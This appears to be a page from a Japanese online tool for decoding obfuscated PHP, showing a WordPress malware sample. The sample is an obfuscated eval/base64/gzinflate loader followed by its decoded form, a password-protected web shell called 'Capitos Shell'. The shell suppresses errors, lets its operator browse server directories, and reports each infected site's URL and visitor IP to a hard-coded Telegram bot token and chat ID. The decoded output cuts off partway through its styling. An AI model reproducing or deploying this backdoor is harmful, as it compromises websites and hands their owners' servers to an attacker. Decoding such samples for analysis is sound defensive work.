Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $Apaaja = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUMn0SyzJSMwLKMrMK85JrdRE\x41tY\x41";$iNathanPrinsley = "8\x42lZR2PSzWnH\x43dqxDujRFGwf6rR8p\x6376Y\x63\x2bxVyL3m\x2b9NoEufvGYqey\x6279hhRXP\x63l4KhnJmnxVMI\x626w0LF04\x43xjrS3kOh\x41RSN\x42L3/6ypliZyWzI\x2b7iIoXHMoQs82FTTzRoMjl8jqLDxfwJpZ0UmdohGw/E5huYdoTigg2VSGV5PUnoDZ\x42JzVdzRXTJd1\x62yfyQ1MP\x63djnKSEI5NOO\x42Z9m9kNulgMtU4S5XdQ2f9g9\x41TWslTVFeg1NUlEgfz2Zd\x2bfFpyGK\x2b/V/1o6ipDYNg/3lmXlMuKnFnK5T/uVhvu\x42hKQ6x6jHNWGPTQ//XIyejLSlEVgs8Gw\x43jfLLeTl4HVOfOtrHutY2rn201TSP\x62\x41T\x2bo\x43hriIKT7TIGW7XNZzn\x61\x41Ew8\x2b9REwp\x42Hrudq/PeTHdkHd0\x2bPNs\x62NR7\x63gOXk1s\x41\x43H\x62T0vJ1KmtoOVvtmtgsi3X7zlDm4GythnrU6uy0o\x43p\x61mQeYgT\x63gnIo\x43MFFHdhQkWYERZt\x42\x61UKlm3Jutl\x2bgW2u\x2bwUH2VEF3w\x42e215sKD4eux\x62SY98qkYv9NF8jTz6ZV\x62gX8uDNVhdyE\x43LW88NEEGQ8F4rNrhyv\x41\x2b\x43XST6j\x42\x62F0HpU/wT\x41R/s4IR1v\x41SKZX5K00HD9E\x2b1V\x61VyZ\x43hY\x420y28Jh/jFYDp\x62utHjLzm9GhQtl\x63fxJNrnZ\x42teyjiFI0n1Ruoee7I\x61G\x42zSe40Et4pWEH2sOH4xHP/SWf\x62kY/Yl\x62eUylz\x41\x62kzJF/eTNNFY156iZO\x2b9FEN//\x2b\x41qOTfhZ9rkJ\x62/iYT\x62\x63yTFzUWuD\x43vm2/\x41D\x43UNx6j\x43iS/u/K9pKit5o11D\x62Rduv\x61Qggu4H\x61TPk\x43m\x62\x42mqdGf1kupqHWkzyyn/\x42s\x42p1S\x2bgyw8\x62FPtNNh\x43P6onZ46enx\x41\x62R\x2b1ZHd\x2bDQmVX\x62YqL9v1Nj\x63LdDZv7Y\x43K5VYRsnkQ\x42js8won4\x411VLEOHdsIn8\x62d3y\x43WPu\x617jJ0ZJV3\x43QoFZDqRNOTM5\x43U5RQ94EoSljeFN\x63PQQVTq9\x63dZN0QplL6d7hU8\x43P22XkzKOQrTQZQyZJKjSkW6on\x41j\x63yrS2g\x436\x627MO\x63M\x6383o791\x63ULuPs\x62s\x41\x62iSHw71JrpnympgK7\x432eZ4JFiohGj\x633tpnE9MEEkdrY902zd1mfPNP\x62PI/kYJ\x43MM5EEXyi\x2boVxVRPphPxRkus4q54\x62\x41oUZy\x63m7oo5rDVg\x41IwmDgv\x611fEUu0rGYM\x42G5TNulmnD\x2bW5Gl3dyXXnns\x2bnJUXXP61qQHpwoWDw\x41SfImDP/UIeZZSEKDKwL/yjYS4P1xmYRql6lnKFrOTFhNGkUhoRNUEDv\x63\x61NmvqwyP\x42HRuStjkdouQKjpoG7W66XN\x63VNuz\x6129pk5o8\x616MDzSXTf/snfQQKg\x43U7t28\x41lptMYdIjIs\x42\x43uUYG\x618soKMViIj\x43/XguKQtDKowe\x41FxuN\x41Kq\x41iyKRWGRF1in\x62TgWQFwdPDEGEh\x43wThxeIl\x634hs3mWH\x63t46\x2bJiJ\x41MGi\x61lf\x41\x62Lw9T\x61Uv\x6230ho\x62KlDsp/GvDu\x2bNwzNnQjZr\x43ME4KxnTlv7wOMLUVfsytVuwZ\x41\x434XQ11zk2EKz\x617re/h1G\x2bEo04SvFkE7p\x41dOxUOsz53mNz157lDH1SLQ5s4xNM9hH3TepS6wHeo7\x2bQk7KXkPyz\x42lI\x41/pqQ2hWHP/\x2b7veoU\x41lZDx\x61\x42\x42sYP\x61oXHfxu\x2brf/\x2bxP\x2bRJ\x43\x42rsM/jwIxF\x619w6xghXq0w1NU\x63VT8g8FOV\x42hjP3t\x42ER62zP\x63nv\x42TGDLtTz0RQiZzL\x62\x633\x63KNep\x63hYVu2MM\x2bYi\x2benZ48jgxr3INpl8KZ\x41z\x2bIiw4/r8Y\x61GZ69x\x41\x62oL/RKOPpgNIS\x43\x41//lTuS2x2xXd\x63XWlvPPihwk/O\x2bfXDOD/hwOFkj7DgdKmzMxSErw//fuP1Y2lFKthKWlo\x61OW8TomGokzgin\x42T5\x61egp0de3IE3uXKE8nmxKrXudK\x42u0yrZVthXyW\x61\x2b2\x634Ti6dhOnhNm7TQuu\x62lenROm7zqF50HGpq\x632\x631\x41SXgiMdznNoLE4EKOwIR5h1eOGUvO8q7O5WX45Q2Yu\x42J\x2bmmz\x62Tg\x61jTV3YW6P\x6261lK\x43/TjgXl6fwyzI5IVkX8\x43wEXyQG/sT/\x42XK0QG9kPt8/1zZmtDsUex\x62ZNmj\x2b6r5Z1x6yl8r\x41\x621\x2bmV3Msw7QVe9y2d\x41G7fDHLe9reZI\x43hpmnO0VyQ3\x2bP\x61HWD\x42fGuW\x41oOov7WGZre\x43XTJ9\x61\x424VHgfr\x63VdmYDgy\x42iEhInd\x41qil\x2b1\x42lnQ\x62GS/\x635E\x2bmrpmKK\x41yM6\x42L\x62miPE\x61s\x43v1qLxkHUQ2gHRQtSx1gT6\x41GE\x41R\x61x3\x63\x41kUs\x41w3IzGuG\x61Oy0PgE1ret\x41\x619\x41\x4240QOxPd\x4134hl8r7l8HWXJXWvJ7yr\x41\x43y5rrek\x41\x42\x2bQkj\x42lkR\x41VgTMJI\x2b15grORPHeGEoIQLX9JneVIkY\x61of\x2bMhzd/XQ\x43\x63\x43ggVepIww4TFNwugt1yVOWfET\x63s6kR9PL3uheDUnNTxzgiLQoUH\x41XIEtl\x2bUZ\x2b\x2bDp\x42RxkZzVYnHJ31wX\x41fh6sSS9XmooJv0Nj8\x63\x2bNFyt1tls\x2bXMgH\x2b\x42HO87UOmpks/wXX3\x423VJ6\x61\x63d9hPou2l\x63o\x41qDLpyWJYpJ04V2mhSgsgKWy2N844ruWqd\x625N1\x637K\x63Udy3W\x41QT\x41TEwYsJGZuvH8mX\x610TGj\x43gyQGzo\x43hww3eH\x43ds\x423x6XD\x2bNf\x417DxE\x62HgeMK\x41\x416\x427Kq5r9IoHjk\x639\x61Z\x63Yg9OwQHMeZDkDKndd\x43w\x2b8FUN\x42Owd2wq\x41KYOY\x41wkIQOxjjf0xukUVDfLvi5gS\x41\x2bGz6REkS\x624mUS\x61xGVh\x41Ynm\x2bf\x6305g\x2b\x41v\x43/0NQ\x435rokEPdwL\x612wXf\x41\x63p6Jyjm\x2b\x41Dd2Dw9gNVwje5hgeheF8zHq7jdypH\x413\x426UZHf/XYwTgv\x42fKgnv04Xe5t1Q\x41Y\x424N4N1Om/IEKjY8H\x2b9pWxmXqJytrteu\x419LtD/OUFtEUQpV4dpqiUnwlDUp\x43wr9Y1yjg\x42oEF5E9z\x41GsGZuQRw2H/QQ2HJKZ\x43N/s2Gg\x63Xf8\x4289s3f\x41z6SurIL0e\x43ZOd\x43WZgZU/mwQZRG6\x41KFuOUKpuekyo\x2bVpIryPy2Mm\x2bF\x41\x41xdu0\x41X3gD45\x63M\x633XjMn\x2bSjezJe\x423mlG7F2\x62RNS0\x62\x43076L6ePTYJi0\x43YRwYisuD3H\x42\x42jfy\x2bfon7gF1N3n6\x62DtKsHM36KOH1Q\x2bGDp\x43N\x63QsHz1T\x2b367/37vLlqR6gkR6Xp\x42euTXjlF\x41DxIkn7IZ9gWvsjkVx\x63GiziD33x\x43\x636F\x4269\x43ugj8DrfG\x2b/87/wh5\x420q\x63Q\x61\x434GqSHwLg9Xk\x2b\x43\x415vD8P86ynzg\x42guZ4V2T\x61gvSKrU7JDwZS4k9d/qDj6ndR4w4e\x627l0R94V\x62QX\x42\x63y\x63G8i\x43zjIDvLoMgdnk9dKvHwL\x42l2JtU\x63XGZ9k\x43I8x\x43/\x43wOjrKx2\x63rNSGumZdMu89nmW\x43FDWn24Ii\x2bN04y5\x43s\x41Ox\x42\x63LK6uTxyVLll0j6S\x63TEI2VNLZ\x63J87ksuZJ\x42HnQ\x63UMJS8sPEz\x63vF\x43toV\x2bkQYme\x43ni\x41zlRXVfrhOq69ZGPSvQr\x62Kz\x2bQY1W1TQDw\x61VS9kO4WFenewF5\x61Y533lp\x430WJ02JvIRU\x43yviXVup2nwRVxKplOnRY\x63sw\x2b08\x41M8KGfMF\x2bX58\x41PPVDqgGL0\x41hrq\x62W\x62wRpm7wiitdT4ty3TVKPv\x62\x621g/mu\x63dQLFrq\x2bd9kRn1QgtpWqHWrdHQ\x43\x63rG\x63D\x62Puhp03gsf6Kn3rFsVYhp\x42\x62FkUDDFFX\x62Si\x61D\x63iX\x61F\x41zYOR\x63Q\x43ST\x41y67uld\x42q\x62qEhn5FxL6w7JwzOlxZr\x6211ZFdOn2\x63\x42kTMYpk\x62Wypz\x43\x41DkGdgsmQ\x42U\x61UethN/Gyt\x62rN81QW9JXX/1otY\x42Y/\x41qdqFqZKoh\x42Qx\x63KQWzPFPtvY0lUF3WW\x61ZLr\x2bziZ\x2bLy\x63yrY1V331m\x41zqyNmijL592TxPi\x41Tud\x2bRwQIDRN\x42wmxo7\x43up6\x63jXg90\x2bEK4Zws2yu4thZJOLL\x63x1F\x435JtwXLv\x43YNzL9\x41U\x61JkX\x42py4tjmTt5iPkemNQ5F\x43GF4ULUQ0YSi2GY\x63OgT7Q/d06lOQLU\x42efXw\x42dUY80d\x2bnEhUgkp\x625HHuNeLY2jt86vXoNg6\x41dYSPmUIIPx\x418\x42njnhPI15rw6eI4XNHYf\x63x7\x41SD\x2b3w66qPNk9jsmXsEKMnK\x61lQdP\x63TJMiXV\x63Wi\x42mj\x61jtjQMZj/fYEvDPW5\x617\x2b\x63XYKU4i\x41IeNlV4fEYd\x41wH\x41Iq5MGkH9oT\x61ID\x42jF3Pykijw0jTMT2rq5o1gYk28HtkLK\x43TN94jHwis\x2bwMjhQgSYMjrQFR2iRLmPm\x42sI\x43G3W\x420SZmuMPwTvQQ\x43I0MXOUP\x62\x61HQ\x63ylG\x2bkVsyvY1qHVI\x61GwonLx/fSGfe/uWd\x41/Zxox71/idPn75vPeo\x63k2SkFU\x62\x62ZpK\x2bT71hvhW2mee5vnIj\x2bddQHxOIeWN7m\x615QvFdx\x62r8\x436mKg308\x2br\x61zXuE5RRoeLS/0\x41StDSgWtxoG/phISpiMgUiRiy\x61mqI\x42OLQ\x2bEh\x2bFxwXH9tYlYHgsYzI\x42g9\x622m\x414/SOYJRh7X7\x623fuhkN\x41wh\x43dEgIVqL\x41YXI/e8\x4192I\x61rHWDHI\x62YN\x63QMR9SMTtHTTl5Yw09pO6\x62EVx5\x43\x63ZO0tisfs5\x43fX3F8Y\x612eYFOWSp\x43rrX6UQYuzkp4ZeR/Vpm\x63w4j\x41ywG6sTlssF/hX\x42No2\x61PDFTeY\x61iQzZV/FI\x41i\x61JEPl\x61yFzi3R76n\x41hIu\x41Dn6MDQ1S\x62tvuiKKRkYWY8IsEmH\x61ix4w\x434dgNVjnGm\x61U\x2bP\x41pn\x41E\x43Q\x61PD57tWyi3pxp\x43dW/q2s62er9sy1KzYRMUDI\x62TkMtttzxsJf\x2bNYQI/rJX019dq3\x2bnJ7\x616hy3\x428tw0R\x2bZ\x62nNVQd/v\x41Q2rG\x63qLVgjn3sW15o\x437/YKjXzLky8\x61VI/K\x63tRhxvN6oZkr9O/\x43\x61W\x62/XX3\x41ytd\x62HpuN\x62p6mpq\x61T4L49rw11YfQ1l9smd48nSVzhW4l2vFn/OnmmzKz\x61w4wGuGm480/MVd3u2G8\x43\x43OOlr7u00\x2bXLk\x42\x61ltP7\x2bjH\x2b7JNY0JmGPo7gtF\x62vgRj\x2b\x41\x2buU7r2HG5UkL\x42KDqD4iR\x425g9mjZ88wP\x42jj\x42fQG\x42\x42v\x620T3/Z3F\x6328fPs\x2bDRy\x42GWFPiYrf\x430YNDsrWUz4NGDFWh52ZDtvkql2y\x631v\x41ohhsE\x412JuDXW0\x43oyd1R7/sDZgzZquM1n1Yfiw\x61o5\x61j7fZ/HVqMUQ/X\x425KRr\x43fitf\x63h2rtG5Zgnios\x63NqUmKr9GF\x43kOsf461vHp\x61g66Udgv68dYNFu6vswqoHDG8DJL\x61RU\x2b8d05ndID\x61\x2bv\x635ZG\x4308V/Z\x43P8n\x634pm4QWyNTe80T9qXnMH/kq\x2bgF9oPR\x2brO603O6UH0Ir4wFJ4HGU\x42POkI//4\x2b/9e6lFWztNF\x42wdiUkUVHZHke1KHzy6o\x2bYmFEs\x62\x42tilw\x63qS2wVJMHLPKXGvYGu2Lv6VNg0kW26WqH\x42\x41SEZW6P\x43MT\x2byj\x63VkIXe/TNdR3/9Tf8J6/e\x41\x42/dj8\x41pXvESX85IY\x41K7Vn88n9v/TNtS2Tw37lvr5/9DRK0ytX3nRqGigogMNu9Mxl\x2b/\x62q9ft\x2bN9u3GLxRdmtkk1lo61vGv5n\x62n9Ln7\x41N8nRP/6xneQ9jMTTK4PDv3Z7EHzI7/Z/9f0u2vu7W3fZFw4\x621pIMs\x43j9\x43o\x63JTS\x63Xmq2n0UnOEi2kMdXyZzvs\x41n\x43N/NYzQ1n\x430MnF\x61yQtmd2Uf0w8mvS4qUyMHn6Os90U8ZX2om\x63\x619flVhSPr\x63Luq6M\x63NT\x61gZzMMTNs7/fPVnDOQmU978pTpqq\x62N\x41rDYwLJ1tlKiEpKe\x61PEmvg9X\x61/X3de\x42KGwwO/\x42zDwwWn\x61DILKyheZyklNID1hteTSrKOLokH7S\x63Y6Sxtj\x62rXHKNxR1PIf\x41v\x62JS\x6272270\x2b7p\x42hl\x42wJev7FEhGw7Z\x42hp\x42wJev7EExGw7J\x42ht\x42wJev7DE\x42Hw75\x41hx\x42wJe";eval(htmlspecialchars_decode(gzinflate(base64_decode($Apaaja))));exit;?>
<?php
$Apaaja = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUMn0SyzJSMwLKMrMK85JrdREAtYA";
$iNathanPrinsley = "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";
eval {
@error_reporting(0);
@ini_set('display_errors', 0);
session_start();
set_time_limit(0);
$pass = "Capitosx";
$telegram_token = "8147229589:AAEe5R3PXmrsGtcACRVUPXAmb6eVK0rJLnM";
$telegram_chat = "5432787586";
// Telegram notification
if (!isset($_COOKIE['notified']) && true) {
$url = "https://api.telegram.org/bot8147229589:AAEe5R3PXmrsGtcACRVUPXAmb6eVK0rJLnM/sendMessage?chat_id=5432787586&text=" . urlencode("🚨 Shell: http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}\nIP: {$_SERVER['REMOTE_ADDR']}\nTime: " . date('Y-m-d H:i:s'));
@file_get_contents($url);
setcookie('notified', '1', time() + 86400);
}
// Auth
if (!isset($_SESSION['logged'])) {
if (isset($_POST['pass']) && md5($_POST['pass']) == md5($pass)) {
$_SESSION['logged'] = 1;
} else {
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>Access</title><style>
*{margin:0;padding:0;box-sizing:border-box}body{background:#000;font-family:monospace;display:flex;justify-content:center;align-items:center;height:100vh}
.box{background:#0a0a0a;border:2px solid #0f0;padding:40px;text-align:center;box-shadow:0 0 30px rgba(0,255,0,.3)}
svg{width:100px;margin-bottom:20px;filter:drop-shadow(0 0 10px #0f0)}h1{color:#0f0;font-size:24px;margin-bottom:20px;text-shadow:0 0 10px #0f0}
input{width:300px;padding:15px;background:#000;border:2px solid #0f0;color:#0f0;font-family:monospace;margin:10px 0}
input[type="submit"]{background:#0f0;color:#000;cursor:pointer;font-weight:bold}input[type="submit"]:hover{box-shadow:0 0 20px rgba(0,255,0,.6)}
</style></head><body><div class="box">
<svg viewBox="0 0 200 200"><circle cx="100" cy="100" r="90" fill="none" stroke="#0f0" stroke-width="3"/>
<path d="M60,80Q100,40 140,80" fill="none" stroke="#0f0" stroke-width="3"/><circle cx="75" cy="90" r="8" fill="#0f0"/>
<circle cx="125" cy="90" r="8" fill="#0f0"/><path d="M70,120Q100,140 130,120" fill="none" stroke="#0f0" stroke-width="3"/>
<path d="M50,150L150,150L140,180L60,180Z" fill="#0f0"/></svg>
<h1>Capitos SHELL</h1><form method="post"><input type="password" name="pass" placeholder="ACCESS CODE" autofocus>
<input type="submit" value="ENTER"></form></div></body></html>
<?php
exit;
}
}
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
$cwd = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
@chdir($cwd);
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>Capitos Shell</title><style>
*{margin:0;padding:0;box-sizing:border-box}body{background:#000;color:#fff;font-family:monospace;font-size:13px}
.hdr{background:#000;border-bottom:2px solid #0f0;padding:15px 20px;display:flex;justify-content:space-between;align-items:center}
.logo{display:flex;align-items:center;gap:10px}.logo svg{width:30px;height:30px}.logo h1{color:#0f0;font-size:18px}
.btn{background:#0f0;color:#000;padding:8px 15px;border:none;cursor:pointer;font-family:monospace;margin:5px}
.btn:hover{box-shadow:0 0 10px rgba(0,255,0,.6)}.info{background:#0a0a0a;padding:10px 20px;border-bottom:1px solid #0f0;display:grid;grid-template-columns:repeat(auto-fit,minmax(200px,1fr));gap:10px}
.info div{color:#0f0;padding:8px;border-left:2px solid #0f0}.nav{background:#0a0a0a;padding:0 20px;display:flex;gap:0;border-bottom:1px solid #0f0;overflow-x:auto}
.nav button{padding:12px 15px;background:transparent;border:none;color:#0f0;cursor:pointer;border-bottom:2px solid transparent;white-space:nowrap}
.nav button:hover{background:rgba(0,255,0,.1)}.nav button.active{border-bottom:2px solid #0f0}.content{padding:20px;max-width:1400px;margin:0 auto}
.tab{display:none}.tab.active{display:block}.card{background:#0a0a0a;border:1px solid #0f0;padding:20px;margin-bottom:15px}
.card h3{color:#0f0;margin-bottom:15px;font-size:16px;border-bottom:2px solid #0f0;padding-bottom:8px}
input,textarea,select{width:100%;padding:10px;background:#000;border:1px solid #0f0;color:#0f0;font-family:monospace;margin-bottom:10px}
textarea{min-height:200px}.tbl{width:100%;border-collapse:collapse;margin-top:15px}.tbl th{background:#0f0;color:#000;padding:10px;text-align:left}
